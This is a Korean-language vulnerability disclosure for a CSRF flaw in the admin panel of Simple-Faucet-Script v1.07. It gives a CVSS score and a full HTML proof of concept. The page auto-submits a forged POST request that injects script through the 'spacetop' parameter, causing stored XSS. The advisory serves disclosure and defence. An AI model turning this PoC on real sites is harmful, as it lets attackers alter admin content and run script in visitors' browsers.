
Salmen2/Simple-Faucet-Script v1.07의 교차 사이트 요청 위조(CSRF) 취약점으로, admin.php?p=ads&c=1에 대한 조작된 POST 요청을 통해 공격자가 임의 코드를 실행할 수 있습니다.
Salmen2/Simple-Faucet-Script v1.07에서 admin.php?p=ads&c=1로 전송되는 조작된 POST 요청을 통해 발생하는 사이트 간 요청 위조(CSRF) 취약점으로, 공격자가 임의의 코드를 실행할 수 있습니다.
CWE-352: 사이트 간 요청 위조 (CSRF)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
이 제품은 관리자 패널에서 사이트 간 요청 위조(CSRF)에 취약합니다. 인증된 관리자가 PoC가 포함된 악성 페이지를 방문하면 CSRF 공격으로 인해 홈페이지 콘텐츠가 무단으로 수정됩니다.
<!DOCTYPE html>
<html>
<head>
<title>CSRF PoC</title>
</head>
<body>
<h3>Standard CSRF PoC</h3>
<form action="https://example.com/admin.php?p=ads&c=1" method="post">
<input type="hidden" name="spacetop" value="<script>alert();</script>" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
공격자는 spacetop 매개변수를 통해 홈페이지에 임의의 HTML/JavaScript를 주입할 수 있으며, 이로 인해 저장형 사이트 간 스크립팅(XSS)이 발생합니다.
Muntadhar M. Ahmed (almuntadhar0x01)